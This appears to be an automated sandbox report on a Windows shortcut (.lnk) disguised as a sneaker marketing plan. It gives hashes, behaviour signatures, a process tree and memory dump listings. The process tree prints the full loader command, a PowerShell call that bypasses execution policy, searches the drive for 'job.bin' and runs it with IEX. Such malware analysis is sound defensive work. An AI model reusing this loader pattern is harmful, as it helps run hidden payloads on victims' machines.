Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    14-12-2024 02:07

General

  • Target

    Creative_Brift_Marketing/Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk

  • Size

    2KB

  • MD5

    d555393c916ab9e4e58f027550375e2b

  • SHA1

    a63e4defb613ee8e3543bdb43046d727710e65a0

  • SHA256

    4d6eb5362d88fbc0d72285c12538b7233529f2ced117aa07bb6d2cd22a6c3db1

  • SHA512

    ab6712f292f132631b92c183f694ee4637e64ac02ed71c72a03a8344ac6bb7c5ecac703676a23706259e6528fd0a95573bdb4de820bbf589c4fc4c9d898f0e4b

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Creative_Brift_Marketing\Creative Brift Marketing Sneaker Daily Deal (6 month plan).lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2896
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "Get-ChildItem -Path 'C:\' -Filter 'job.bin' -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { IEX (Get-Content $_.FullName -Raw) }"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "Get-ChildItem -Path 'C:\' -Filter 'job.bin' -Recurse -Force -ErrorAction SilentlyContinue | ForEach-Object { IEX (Get-Content $_.FullName -Raw) }"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2760-40-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

    Filesize

    4KB

  • memory/2760-41-0x000000001B800000-0x000000001BAE2000-memory.dmp

    Filesize

    2.9MB

  • memory/2760-42-0x0000000001F00000-0x0000000001F08000-memory.dmp

    Filesize

    32KB

  • memory/2760-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-46-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-47-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-48-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-49-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

    Filesize

    4KB

  • memory/2760-50-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

  • memory/2760-52-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB